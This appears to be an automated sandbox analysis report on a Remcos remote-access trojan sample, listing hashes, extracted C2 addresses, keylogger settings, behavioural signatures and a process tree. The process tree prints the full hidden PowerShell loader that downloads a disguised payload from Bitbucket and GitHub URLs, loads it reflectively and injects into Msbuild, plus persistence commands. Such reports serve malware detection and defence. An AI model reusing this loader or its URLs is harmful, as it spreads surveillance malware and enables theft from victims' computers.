Analysis

  • max time kernel
    117s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    17-09-2024 03:09

General

  • Target

    979a4028365ad066650c78f85cfba5826595c25a65b4fe94d7022c5b3329b2f4N.exe

  • Size

    311KB

  • MD5

    d538263914eafa5c4a7bc69bb6d6ecb0

  • SHA1

    b44c3e6464fe41e2c33a74186457ffb314fe48e1

  • SHA256

    979a4028365ad066650c78f85cfba5826595c25a65b4fe94d7022c5b3329b2f4

  • SHA512

    8cb3a952e002cf4150f882e9901470ad86eb9a8bd0540fa50d6a6b77634a15018c042dd04bc9ba8ab2ee240c0a197bd7d4c0727eae096c81903e387ea596b8d3

  • SSDEEP

    6144:CbJhs7QW69hd1MMdxPe9N9uA0hu9TB6xdb9t/iZSe:CbjDhu9Tk/f/iZ

Malware Config

Extracted

Family

remcos

Botnet

NEW24

C2

authlog.kozow.com:8081

195.211.98.63:8090

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    win.exe

  • copy_folder

    excel

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    Win32

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    winnngeegrhsggbdvdv-QGDR73

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell and hides the display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\979a4028365ad066650c78f85cfba5826595c25a65b4fe94d7022c5b3329b2f4N.exe
    "C:\Users\Admin\AppData\Local\Temp\979a4028365ad066650c78f85cfba5826595c25a65b4fe94d7022c5b3329b2f4N.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B844.tmp\B845.tmp\B846.bat C:\Users\Admin\AppData\Local\Temp\979a4028365ad066650c78f85cfba5826595c25a65b4fe94d7022c5b3329b2f4N.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3732
      • C:\Windows\system32\find.exe
        find "QEMU"
        3⤵
          PID:4164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "$codigo = '[Base64-encoded payload omitted]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:232
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.OC1R/niam/tidua/olamotnas/moc.tnetnocresubuhtig.war//:sptth', '2', 'windirwin', 'Msbuild', '1'))}}"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1572
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\ProgramData\windirwin.vbs'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3272
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\write.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3940
              • C:\Windows\system32\timeout.exe
                timeout 60
                6⤵
                • Delays execution with timeout.exe
                PID:1056
              • C:\Windows\system32\tasklist.exe
                tasklist /fi "ImageName eq Msbuild.exe" /fo csv
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4352
              • C:\Windows\system32\find.exe
                find /I "Msbuild.exe"
                6⤵
                  PID:8
                • C:\Windows\system32\timeout.exe
                  timeout 60
                  6⤵
                  • Delays execution with timeout.exe
                  PID:2088

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        7f6b840a2ea930a42b14ed71ad6849c5

        SHA1

        a61bea32b13b67dd2868d285ad2fd058fca3c43e

        SHA256

        9ecf63e750463498ffb46bdcfd64a4ed0bae0ef80c5b43f438211f06b40a145d

        SHA512

        37fefc17e40bca636608acc6ddbf47c3a3e87b87267c892ada02101484b8dd82b53ec91e12c583aa10beb5812d7536cbee38faf465594461722896960d182448

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        a6c9d692ed2826ecb12c09356e69cc09

        SHA1

        def728a6138cf083d8a7c61337f3c9dade41a37f

        SHA256

        a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

        SHA512

        2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

      • C:\Users\Admin\AppData\Local\Temp\B844.tmp\B845.tmp\B846.bat

        Filesize

        14KB

        MD5

        53f894bd602d885153659a1c9a6aa769

        SHA1

        bd4278fbb680244ad1ce43da84181902cd261f75

        SHA256

        a91e7acbfdacb614bc29050e5988f95f9fe2d12ff323edf215f2d6a41f292391

        SHA512

        a4f0a0c8c65592a5cccc77a3e5aafe395acdc5b7238f76cc7d27e4a23af711428f970cd7bd8caa33b0fdf529015c373a93513e22b99a6409e75e80b0e06ee8f1

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hyjr4fm.mn2.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\write.bat

        Filesize

        234B

        MD5

        14cf949fb906d5e44392c1ad435d89dd

        SHA1

        05599cc9a3f914502da5c0ae2ed20ae89f95d9ad

        SHA256

        9b6f465c3dddc34928d516f583dbd73254173d92cd0662fe5f133a65641e35fb

        SHA512

        716c4863277cd9ae896758a54867c53345606f6dc61dd3d1ed051b7bc93bc8ca47b9d91cc6383b7835a5d5f6182cd8a5f6a0bc7b493c5baaf30cca61041b3d5e

      • C:\Users\Admin\AppData\Roaming\Win32\logs.dat

        Filesize

        184B

        MD5

        2bf9ec93d2114bc5d72fcac83051a8f8

        SHA1

        2ead6d36c2d191f0fbbe17740e5553efa343eed0

        SHA256

        480183c080f92757707a183aeef2e526a5aae60f091717cbbb205040b110ee30

        SHA512

        f279c1b0c865e08b4f1ea7c2a35b0143f246a9cf628bbc1a38f91c34b79d7372bcf4e9914e7ffa5b17fa055630add04900711b9d21c1027767634393d05a93c3
